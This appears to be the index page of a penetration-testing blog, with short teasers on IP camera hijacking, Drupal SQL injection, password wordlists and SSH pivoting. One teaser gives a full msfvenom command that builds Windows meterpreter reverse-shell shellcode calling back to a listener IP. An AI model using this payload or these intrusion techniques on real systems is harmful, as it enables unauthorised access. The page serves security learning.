Internet of Things -- D-Link DCS-930L

With the recent talk about hijacking IP cameras for the purposes of creating a bot army, I decided to order a camera.   I'd seen this model or one like it in my local lunch place and I ordered one from Amazon.  Two days later, I got my target, a "D-Link DCS-930L Wi-Fi Camera with Remote Viewing".  Nothing fancy really.  Just a $30 camera that can be used wired or wirelessly, but apparently only good for "day use".  It will serve my purpose though.  Army of one.

Read more: Internet of Things -- D-Link DCS-930L

Command Line -- Microsoft Office Version

I needed to quickly gather the version of Microsoft Office in a mixed version environment.  Simple enough, let's grab the version of Word:

reg query "HKEY_CLASSES_ROOT\Word.Application\CurVer"

Read more: Command Line -- Microsoft Office Version

Drupal to Low Priv Shell

There’s a certain feeling of satisfaction when you can manually work your way through exploiting a box.  Not only that, you’ll have a better understanding of what’s really going on under the hood.  You don’t really get that when you’re using automated tools.  Not that I don’t use what’s in the toolbox but given the choice, I will try the manual route first.

I've not seen much of Drupal from either side but I found myself staring at a 7.31 installation and after some quick searches, I realized it was vulnerable to SQL injection.

Read more: Drupal to Low Priv Shell

msfvenom -- Specific Byte Count

I wanted to generate some shell code for an exploit and I used the following command:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.55.11 LPORT=443 -f js_le -b "\x00\x0a\x0d"

Read more: msfvenom -- Specific Byte Count

Cewl -- Building Wordlists

I have a wordlist I created from a collection of wordlists I've acquired.  It's not the end-all, be-all wordlist but it's a big and if you have a weak password, it's in this list.  In fact, if you have a decent password, it's in the list.

It's a good list for banging against passwords to see if they are reasonably secure.  When I attempt to crack a passwords, I go to the top 10 most used, the top 500 most used, and then 'the' list.  Beyond that, I'm probably going to stop unless I have a different motivation.

Read more: Cewl -- Building Wordlists

SSH Port Forwarding

Network segmentation is common in the enterprise but becoming more common in smaller environments.  If I compromise a box in my local segment and that box has access to another segment, we can use port forwarding to leap frog across.

The typical example has us making an actual connection which ties up one of our terminal sessions with an open ssh connection.  Fine, we can spawn a bunch of terminal sessions but we can also background it.

Read more: SSH Port Forwarding